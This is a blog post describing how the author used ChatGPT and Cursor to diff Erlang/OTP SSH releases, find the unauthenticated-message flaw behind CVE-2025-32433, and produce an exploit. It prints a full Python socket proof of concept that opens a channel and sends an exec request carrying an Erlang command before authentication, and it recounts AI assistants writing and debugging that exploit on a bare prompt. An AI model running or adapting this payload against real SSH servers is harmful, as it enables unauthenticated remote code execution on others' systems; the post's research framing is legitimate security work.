How I Used AI to Create a Working Exploit for CVE-2025-32433 Before Public PoCs Existed

🪴 Anil's Garden

Writing the Proof of Concept for CVE-2025-32433

Let’s go on a little journey.

I’m drinking my coffee, scrolling through Twitter, and there it is — this tweet from Horizon3:

👉 https://x.com/Horizon3Attack/status/1912945580902334793

They’ve got a proof of concept for CVE-2025-32433. They say it was “surprisingly easy.” But they didn’t drop the code. Hmm.

Naturally, I thought: If it’s that easy… can AI just write it for me?

🤖 AI-Driven Exploits?

Turns out — yeah, it kinda can.

GPT-4 not only understood the CVE description, but it also figured out what commit introduced the fix, compared that to the older code, found the diff, located the vuln, and even wrote a proof of concept. When it didn’t work? It debugged it and fixed it too.

Let’s walk through how I got there.

📸 The Initial Clue

The first thing I did was grab the python output code in Horizon’s animated GIF. It wasn’t much, but it felt useful to hand to GPT.

Horizon3 Tweet

A little nudge in the right direction never hurts.

📎 Finding the Versions

Next up: I checked out the official Erlang advisory on GitHub to find both an affected version and a patched one.

Affected and Patched Versions

I knew I’d want to diff these versions. So I gave GPT this basic prompt, and here’s what it spat out:

❯ git checkout OTP-27.3.1
mkdir -p ../ssh_5_2_9
cp -a lib/ssh/\* ../ssh_5_2_9/
 
# Checkout the commit that introduces ssh-5.2.10
git checkout 71219a5123309c8cf66f929a19a100a242e15681
mkdir -p ../ssh_5_2_10
cp -a lib/ssh/\* ../ssh_5_2_10/

It even explained what was happening in each step. Helpful! At this point, I had two snapshots: ssh_5_2_9 (vulnerable) and ssh_5_2_10 (patched). Time to diff.

🔍 diff.py — Our Code Archaeologist

GPT gave me this small but mighty Python script to recursively diff the two versions:

import os
import difflib
 
def get_source_files(base_dir):
    return {
        os.path.relpath(os.path.join(root, f), base_dir): os.path.join(root, f)
        for root, _, files in os.walk(base_dir)
        for f in files if f.endswith((".erl", ".hrl"))
    }
 
def safe_readlines(path):
    for enc in ("utf-8", "latin-1"):
        try:
            with open(path, "r", encoding=enc) as f:
                return f.readlines()
        except UnicodeDecodeError:
            continue
    return None
 
def compare_versions(dir1, dir2):
    files1, files2 = get_source_files(dir1), get_source_files(dir2)
    common = sorted(set(files1) & set(files2))
    diffs = {
        path: list(difflib.unified_diff(
            safe_readlines(files1[path]), safe_readlines(files2[path]),
            fromfile=f"{os.path.basename(dir1)}/{path}",
            tofile=f"{os.path.basename(dir2)}/{path}"))
        for path in common
        if safe_readlines(files1[path]) and safe_readlines(files2[path])
    }
    return diffs
 
# Run diff and print results
base1, base2 = "../ssh_5_2_9", "../ssh_5_2_10"
diffs = compare_versions(base1, base2)
 
print("\n🔍 Changed Files Between SSH 5.2.9 and 5.2.10 (Recursive):")
print("---------------------------------------------------------")
for f, lines in diffs.items():
    print(f"{f}: {len(lines)} changed lines")
 
print("\n\n📄 Full Diffs for All Changed Files:\n")
print("=====================================")
for f, lines in diffs.items():
    print(f"\n--- {f} ---\n{''.join(lines)}")

This script loops through every.erl and.hrl file, compares them line-by-line, and prints both a summary and the full unified diff.

So we got back a long list of diffs that looked something like:

....omitted for brevity...
+early_rce(Config) ->
+    ...
+    TypeReq = "exec",
+    DataReq = <<?STRING(<<"lists:seq(1,10).">>)>>,
+    ...
+    {send, SshMsgChannelRequest},
+    {match, disconnect(), receive_msg}
....omitted for brevity...

Yeah — this was big. I won’t paste the whole thing here because we’d be scrolling forever.

So (and you probably saw this coming)… I gave it to ChatGPT and just said:

“Hey, can you tell me what caused this vulnerability?”

GPT Find The Bug!

🤯 GPT’s Take: Actually Insightful

GPT didn’t just guess. It explained the why behind the vulnerability, walking through the change in logic that introduced protection against unauthenticated messages — protection that didn’t exist before.

Here’s the relevant patch that fixed it:

+handle_msg(Msg, Connection, server, Ssh = #ssh{authenticated = false}) ->
+    %% RFC4252 Section 6: Reject protocol messages before authentication.
+    MsgFun = fun(M) ->
+                     MaxLogItemLen = ?GET_OPT(max_log_item_len, Ssh#ssh.opts),
+                     io_lib:format("Connection terminated. Unexpected message for unauthenticated user."
+                                   " Message:  ~w", [M],
+                                   [{chars_limit, MaxLogItemLen}])
+             end,
+    ?LOG_DEBUG(MsgFun, [Msg]),
+    {disconnect, {?SSH_DISCONNECT_PROTOCOL_ERROR, "Connection refused"}, handle_stop(Connection)};

Boom. That’s the key right there. Prior to this patch, unauthenticated users could send crafted SSH messages — and the server wouldn’t stop them.

Now we knew what was broken. We knew how it got fixed. All that was left? Trigger it.

🧪 GPT Offers Options (Because of Course It Did)

Classic GPT move — it asked me:

“Want a full PoC client? A Metasploit-style demo? A patched SSH server to trace further?”

Yes. All of it. Let’s start with the PoC.

💥 The First Proof of Concept (PoC)

Here’s what GPT generated. It was raw — just a Python socket script that tries to open a channel and send a command before authentication finishes.

import socket
import struct
 
HOST = "127.0.0.1"  # Change to vulnerable SSH server IP
PORT = 2222         # Change to correct SSH port
 
# Utilities
def string_payload(s):
    s_bytes = s.encode("utf-8")
    return struct.pack(">I", len(s_bytes)) + s_bytes
 
def build_channel_open(channel_id=0):
    return (
        b"\x5a" +  # SSH_MSG_CHANNEL_OPEN
        string_payload("session") +
        struct.pack(">I", channel_id) +  # sender channel
        struct.pack(">I", 0x68000) +     # initial window size
        struct.pack(">I", 0x10000) +     # max packet size
        b""
    )
 
def build_channel_request(channel_id=0, command="file:write_file(\"/lab.txt\", <<\"pwned\">>)."):
    payload = (
        b"\x62" +
        struct.pack(">I", channel_id) +
        string_payload("exec") +
        b"\x01" +
        string_payload(command)
    )
    return payload
 
def build_kexinit():
    cookie = b"\x00" * 16
    def name_list(l): return string_payload(",".join(l))
    return (
        b"\x14" + cookie +
        name_list(["diffie-hellman-group14-sha1"]) +
        name_list(["ssh-rsa"]) +
        name_list(["aes128-ctr"]) * 2 +
        name_list(["hmac-sha1"]) * 2 +
        name_list(["none"]) * 2 +
        name_list([]) * 2 +
        b"\x00" + struct.pack(">I", 0)
    )
 
# Step-by-step protocol
with socket.create_connection((HOST, PORT)) as s:
    print("[*] Connecting to SSH server...")
 
    s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
    banner = s.recv(1024)
    print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}")
 
    print("[*] Sending KEXINIT...")
    kex_packet = build_kexinit()
    kex_len = struct.pack(">I", len(kex_packet) + 1)
    kex = kex_len + b"\x0a" + kex_packet + b"\x00" * 6
    s.sendall(kex)
 
    print("[*] Sending channel_open...")
    chan_open = build_channel_open()
    chan_len = struct.pack(">I", len(chan_open) + 1)
    s.sendall(chan_len + b"\x0a" + chan_open + b"\x00" * 6)
 
    print("[*] Sending channel_request with exec payload...")
    chan_req = build_channel_request(command='file:write_file("/lab.txt", <<"pwned">>).')
    req_len = struct.pack(">I", len(chan_req) + 1)
    s.sendall(req_len + b"\x0a" + chan_req + b"\x00" * 6)
 
    print("[✓] Exploit sent. If target was vulnerable, it attempted to write /lab.txt.")

🛠️ Debugging with Cursor

No surprise here: the initial code didn’t work.

So I pivoted. Since this was becoming more code-heavy, I opened up Cursor, loaded in the code, opened a terminal, and just asked:

“Fix the PoC code?”

Cursor... or expert hacker?

No detailed guidance. No constraints. Just a dev terminal, the broken script, and a hopeful prompt.

To my surprise?

It worked.

GPT (via Cursor and Sonnet 3.7) fixed the issues, reshaped the protocol messages, and got it working.

CVE Execution

I ran the fixed version, and it successfully wrote to /lab.txt on my test system. A clean, working, fully AI-generated exploit for a CVE that had no public PoC at the time.

🎉 Final Thoughts

That’s it. From a tweet → to digging into diffs → to full PoC exploit — all with no prior public code to start from. And most of it done by AI.

Wild.

This opens up some serious questions about how quickly AI can assist in vulnerability research — or even automate entire chunks of it. We’re watching a new era of security tooling come to life.

Closing Thoughts

What started as curiosity about a tweet turned into a deep exploration of how AI is changing vulnerability research. A few years ago, this process would have required specialized Erlang knowledge and hours of manual debugging. Today, it took an afternoon with the right prompts.

Is this good or concerning? Probably both. It democratizes security research while potentially lowering the barrier for exploit development. But that’s precisely why responsible disclosure and collaborative security practices matter more than ever.

Huge thanks to Horizon3 and Fabian Baeumer for their responsible disclosure of this vulnerability. Their work continues to make the security community stronger.